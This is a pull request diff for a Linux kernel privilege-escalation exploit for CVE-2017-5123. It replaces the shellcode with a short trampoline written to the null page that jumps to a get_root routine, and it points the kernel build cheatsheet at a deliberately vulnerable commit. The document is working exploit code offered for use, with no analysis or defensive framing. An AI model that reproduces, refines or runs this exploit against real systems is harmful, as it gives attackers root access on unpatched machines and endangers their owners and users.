### PR TITLE
 CVE-2017-5123: use Geluchat's shellcode

### DIFF
--- a/CVE-2017-5123/exploit/exploit_null_ptr_deref.c
+++ b/CVE-2017-5123/exploit/exploit_null_ptr_deref.c
@@ -64,6 +64,10 @@ unsigned long get_kernel_sym(char *name)
 
 int main(int ac, char **av)
 {
+	static const unsigned char shellcode[] = {
+		0xFF, 0x24, 0x25, 0x08, 0x00, 0x00, 0x00, 0x00,
+	};
+
 	if (ac != 2) {
 		printf("./exploit kernel_offset\n");
 		printf("exemple = 0xffffffff81f3f45a");
@@ -85,24 +89,9 @@ int main(int ac, char **av)
 		return -1;
 	}
 	printf("[+] Allocation success !\n");
-	/* memset(0, 0xcc, 4096); */
-/*
-movq rax, 0xffffffff81f3f45a
-movq [rax], 0
-mov rax, 0x4242424242424242
-call rax
-xor rax, rax
-ret
-replace 0x4242424242424242 by get_root
-https://defuse.ca/online-x86-assembler.htm#disassembly
-	 */
-	unsigned char shellcode[] = 
-	{ 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
-	void **get_root_offset = rawmemchr(shellcode, 0x42);
-	(*get_root_offset) = get_root;
 
 	memcpy(0, shellcode, sizeof(shellcode));
-	/* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */
+	*(unsigned long*)sizeof(shellcode) = (unsigned long)get_root;
 
 	if(-1 == (pid = fork())) {
 		perror("fork()");

--- a/CVE-2017-5123/kernel_compilation_cheatsheet.md
+++ b/CVE-2017-5123/kernel_compilation_cheatsheet.md
@@ -3,7 +3,7 @@
 1. download kernel and build
 ```sh
 git clone https://github.com/torvalds/linux
-git checkout 4c48abe91be03d191d0c20cc755877da2cb35622^
+git checkout 96ca579a1ecc943b75beba58bebb0356f6cc4b51^
 make defconfig
 make -j 4
 ```


### PR DESCRIPTION
- Uses Geluchat's shellcode as a trampoline (fixes #3)
- Change commit number to a **vulnerable** one